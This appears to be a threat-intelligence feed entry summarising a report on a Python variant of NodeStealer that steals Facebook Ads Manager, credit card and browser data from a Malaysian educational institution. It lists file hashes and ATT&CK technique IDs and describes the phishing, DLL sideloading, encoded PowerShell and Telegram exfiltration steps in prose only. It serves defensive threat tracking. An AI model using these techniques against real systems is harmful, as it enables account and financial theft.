Python-Based NodeStealer Version Targets Facebook Ads Manager
Dec. 19, 2024, 1:39 p.m.
Tags
External References
Description
The latest variant of NodeStealer has evolved from JavaScript to Python, expanding its data theft capabilities. Trend Micro's MXDR team uncovered this advanced version in a campaign targeting a Malaysian educational institution, linked to a Vietnamese threat group. The malware now targets Facebook Ads Manager accounts, stealing critical financial and business information alongside credit card details and browser data. The infection begins with a spear-phishing email containing a malicious link, which downloads and installs the malware disguised as a legitimate application. Sophisticated techniques like DLL sideloading and encoded PowerShell commands are used to bypass security and execute the final payload, exfiltrating data via Telegram.
Date
Published: Dec. 19, 2024, 12:56 p.m.
Created: Dec. 19, 2024, 12:56 p.m.
Modified: Dec. 19, 2024, 1:39 p.m.
Indicators
f813da93eed9c536154a6da5f38462bfb4ed80c85dd117c3fd681cf4790fbf71
ed1c48542a3e58020bd624c592f6aa7f7868ee16fbb03308269d44c4108011b1
786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458
1c9c7bb07acb9d612af2007cb633a6b1f569b197b1f93abc9bd3af8593e1ec66
0b1866b627d8078d296e7d39583c9f856117be79c1d226b8c9378fe075369118
Attack Patterns
NodeStealer
Vietnamese threat group
T1114.001
T1053.005
T1574.002
T1204.001
T1059.001
T1566.002
T1547.001
T1056.001
T1071.001
T1005
T1140
T1027
T1041
Additional Informations
Education
Malaysia